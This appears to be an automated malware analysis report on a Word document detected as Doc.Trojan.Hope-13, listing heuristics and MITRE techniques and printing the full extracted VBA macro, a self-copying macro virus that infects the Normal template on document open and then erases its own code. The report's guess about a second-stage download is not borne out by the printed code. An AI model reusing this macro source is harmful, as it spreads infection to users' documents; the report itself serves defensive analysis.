MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros, specifically triggering a Document_Open macro. This macro is designed to modify the Normal template and potentially execute further malicious actions. The ClamAV detection 'Doc.Trojan.Hope-13' strongly suggests malicious intent, likely involving the download or execution of a second-stage payload.
Heuristics 3
-
ClamAV: Doc.Trojan.Hope-13 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hope-13
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2583 bytes |
SHA-256: dfadf63897f8c3c3a7784f33d2129fa54276d0ab88518df9e4310c5b243c4cab |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Application.EnableCancelKey = wdCancelDisabled Options.ConfirmConversions = True Options.SaveNormalPrompt = True Options.VirusProtection = True If ThisDocument = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument HD = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) If Target.VBProject.VBComponents.Item(1).CodeModule.CountOfLines >= 1 Then TD = Target.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Target.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) End If If HD <> TD Then If Target = ActiveDocument Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString HD ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines ActiveDocument.Saved = True NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines NormalTemplate.Saved = True ElseIf Target = NormalTemplate Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString HD NormalTemplate.Save NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines NormalTemplate.Saved = True ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines ActiveDocument.Saved = True End If ElseIf HD = TD Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines NormalTemplate.Saved = True ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines ActiveDocument.Saved = True End If End Sub 'Rachel Is A Hottie! |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.